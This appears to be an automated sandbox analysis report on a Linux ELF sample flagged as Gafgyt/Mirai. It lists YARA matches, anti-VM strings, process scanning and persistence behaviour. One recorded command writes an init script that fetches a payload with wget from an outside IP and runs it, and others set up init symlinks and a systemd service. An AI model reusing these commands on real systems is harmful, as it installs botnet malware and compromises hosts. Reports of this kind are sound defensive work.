          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: classification engineClassification label: mal100.spre.troj.evad.linELF@0/9@0/0

          Persistence and Installation Behavior

          barindex
          Source: /tmp/x86_64.nn.elf (PID: 6230)File: /etc/profileJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6230)File: /etc/rc.localJump to behavior
          Source: /usr/bin/ln (PID: 6309)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
          Source: /usr/bin/ln (PID: 6332)File: /etc/rc.d/S99sh -> /etc/init.d/shJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6230)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6305)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6313)File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6472/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6471/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6482/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6474/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6473/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6476/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6442/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6475/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6445/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6467/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6478/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6466/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6477/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6061/cmdlineJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6470/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6481/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6480/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/799/cmdlineJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6469/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6468/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6336)File opened: /proc/6479/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6254)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6303)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6306)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6310)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6311)Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6315)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6331)Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"Jump to behavior
          Source: /bin/sh (PID: 6305)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
          Source: /bin/sh (PID: 6313)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/shJump to behavior
          Source: /bin/sh (PID: 6328)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
          Source: /usr/bin/dash (PID: 6312)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.jSHAVmWWrE /tmp/tmp.CXFzKUkFGh /tmp/tmp.rl4jlLXWcpJump to behavior
          Source: /usr/bin/dash (PID: 6314)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.jSHAVmWWrE /tmp/tmp.CXFzKUkFGh /tmp/tmp.rl4jlLXWcpJump to behavior
          Source: /bin/sh (PID: 6272)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6230)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6305)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6313)File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6230)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file
          Source: /tmp/x86_64.nn.elf (PID: 6230)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
          Source: /bin/sh (PID: 6310)Writes shell script file to disk with an unusual file extension: /etc/init.d/shJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: /tmp/x86_64.nn.elf (PID: 6230)File: /etc/init.d/systemJump to dropped file
          Source: /bin/sh (PID: 6310)File: /etc/init.d/shJump to dropped file
          Source: /tmp/x86_64.nn.elf (PID: 6230)File: /tmp/x86_64.nn.elfJump to behavior
          Source: x86_64.nn.elf, 6245.1.000000000168f000.0000000001691000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
          Source: x86_64.nn.elf, 6230.1.00007ffc9ec24000.00007ffc9ec45000.rw-.sdmp, x86_64.nn.elf, 6245.1.00007ffc9ec24000.00007ffc9ec45000.rw-.sdmp, x86_64.nn.elf, 6333.1.00007ffc9ec24000.00007ffc9ec45000.rw-.sdmp, x86_64.nn.elf, 6335.1.00007ffc9ec24000.00007ffc9ec45000.rw-.sdmp, x86_64.nn.elf, 6338.1.00007ffc9ec24000.00007ffc9ec45000.rw-.sdmpBinary or memory string: qemu-

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: x86_64.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: x86_64.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6230, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6245, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6333, type: MEMORYSTR
